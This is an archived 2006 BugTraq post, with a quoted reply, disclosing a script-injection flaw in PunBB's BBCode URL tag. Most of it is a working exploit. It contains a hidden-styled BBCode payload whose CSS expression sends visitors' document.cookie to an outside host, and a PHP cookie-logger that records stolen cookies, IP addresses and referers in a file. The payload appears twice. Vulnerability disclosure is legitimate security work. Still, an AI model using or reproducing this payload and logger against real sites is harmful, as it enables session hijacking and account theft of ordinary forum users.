BugTraq
Back to list
|
Post reply
PunBB BBCode URL Tag Script Injection Vulnerability
Jan 16 2006 11:34AM
night_warrior771 hotmail com
(1 replies)
##Night_Warrior<Kurdish Hacker>
##night_warrior771[at]hotmail.com
##PunBB BBCode URL Tag Script Injection Vulnerability
##Contact :night_warrior771[at]hotmail.com
Vulnerable:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'
style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http
://nigwar.tollfreepage.com/cookies.php?c='+document.cookie;this.sss=null
`style='font-size:0;][/url][/url]'[/color]
<?php
cookies.php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, '
Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>
Contact :night_warrior771[at]hotmail.com
Night_Warrior
[ reply ]
Re: PunBB BBCode URL Tag Script Injection Vulnerability
Jan 17 2006 07:07PM
Rickard Andersson (security punbb org)
Privacy Statement
Copyright 2010, SecurityFocus
##night_warrior771[at]hotmail.com
##PunBB BBCode URL Tag Script Injection Vulnerability
##Contact :night_warrior771[at]hotmail.com
Vulnerable:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'
style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http
://nigwar.tollfreepage.com/cookies.php?c='+document.cookie;this.sss=null
`style='font-size:0;][/url][/url]'[/color]
<?php
cookies.php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, '
Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>
Contact :night_warrior771[at]hotmail.com
Night_Warrior
[ reply ]